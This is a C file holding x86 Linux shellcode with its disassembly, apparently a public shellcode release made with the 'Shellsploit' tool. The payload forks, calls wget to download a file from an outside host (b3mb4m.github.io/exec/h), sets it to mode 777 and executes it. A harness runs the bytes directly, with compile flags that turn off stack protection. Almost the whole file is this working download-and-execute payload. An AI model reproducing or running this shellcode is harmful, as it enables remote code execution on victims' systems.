/* --------------------------------------------------------------------------------------------------------    [+] Author  : B3mB4m [~] Contact : b3mb4m@protonmail.com [~] Project : https://github.com/b3mb4m/Shellsploit [~] Greetz  : Bomberman,T-Rex,KnocKout,ZoRLu [~] Poc     : http://imgur.com/hHB4yiQ       #We are still working on ROP Chain, stay tuned :)       """ You can convert it an elf file:       If you want test:     Important : your filename len must be one byte(Weird bug I'll fix it soon lol).     Default settings for http://b3mb4m.github.io/exec/h     Source codes : b3mb4m.github.io/exec/hello.asm """          00000000  31C0              xor eax,eax 00000002  B002              mov al,0x2 00000004  CD80              int 0x80 00000006  31DB              xor ebx,ebx 00000008  39D8              cmp eax,ebx 0000000A  743B              jz 0x47 0000000C  31C9              xor ecx,ecx 0000000E  31DB              xor ebx,ebx 00000010  31C0              xor eax,eax 00000012  6A05              push byte +0x5 00000014  89E1              mov ecx,esp 00000016  89E1              mov ecx,esp 00000018  89E3              mov ebx,esp 0000001A  B0A2              mov al,0xa2 0000001C  CD80              int 0x80 0000001E  31C9              xor ecx,ecx 00000020  31C0              xor eax,eax 00000022  50                push eax 00000023  B00F              mov al,0xf 00000025  6A68              push byte +0x68 00000027  89E3              mov ebx,esp 00000029  31C9              xor ecx,ecx 0000002B  66B9FF01          mov cx,0x1ff 0000002F  CD80              int 0x80 00000031  31C0              xor eax,eax 00000033  50                push eax 00000034  6A68              push byte +0x68 00000036  89E3              mov ebx,esp 00000038  50                push eax 00000039  89E2              mov edx,esp 0000003B  53                push ebx 0000003C  89E1              mov ecx,esp 0000003E  B00B              mov al,0xb 00000040  CD80              int 0x80 00000042  31C0              xor eax,eax 00000044  40                inc eax 00000045  CD80              int 0x80 00000047  6A0B              push byte +0xb 00000049  58                pop eax 0000004A  99                cdq 0000004B  52                push edx 0000004C  6865632F68        push dword 0x682f6365 00000051  682F2F6578        push dword 0x78652f2f 00000056  68622E696F        push dword 0x6f692e62 0000005B  6869746875        push dword 0x75687469 00000060  68346D2E67        push dword 0x672e6d34 00000065  6862336D62        push dword 0x626d3362 0000006A  89E1              mov ecx,esp 0000006C  52                push edx 0000006D  6A74              push byte +0x74 0000006F  682F776765        push dword 0x6567772f 00000074  682F62696E        push dword 0x6e69622f 00000079  682F757372        push dword 0x7273752f 0000007E  89E3              mov ebx,esp 00000080  52                push edx 00000081  51                push ecx 00000082  53                push ebx 00000083  89E1              mov ecx,esp 00000085  CD80              int 0x80 */   //Project : https://github.com/b3mb4m/Shellsploit //This file created with shellsploit .. //30/01/2016 - 02:59:21 //Compile : gcc -fno-stack-protector -z execstack shell.c -o shell    unsigned char shellcode[] = "\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x74\x3b\x31\xc9\x31\xdb\x31\xc0\x6a\x05\x89\xe1\x89\xe1\x89\xe3\xb0\xa2\xcd\x80\x31\xc9\x31\xc0\x50\xb0\x0f\x6a\x68\x89\xe3\x31\xc9\x66\xb9\xff\x01\xcd\x80\x31\xc0\x50\x6a\x68\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80\x6a\x0b\x58\x99\x52\x68\x65\x63\x2f\x68\x68\x2f\x2f\x65\x78\x68\x62\x2e\x69\x6f\x68\x69\x74\x68\x75\x68\x34\x6d\x2e\x67\x68\x62\x33\x6d\x62\x89\xe1\x52\x6a\x74\x68\x2f\x77\x67\x65\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80";    int main(void){     (*(void(*)()) shellcode)(); }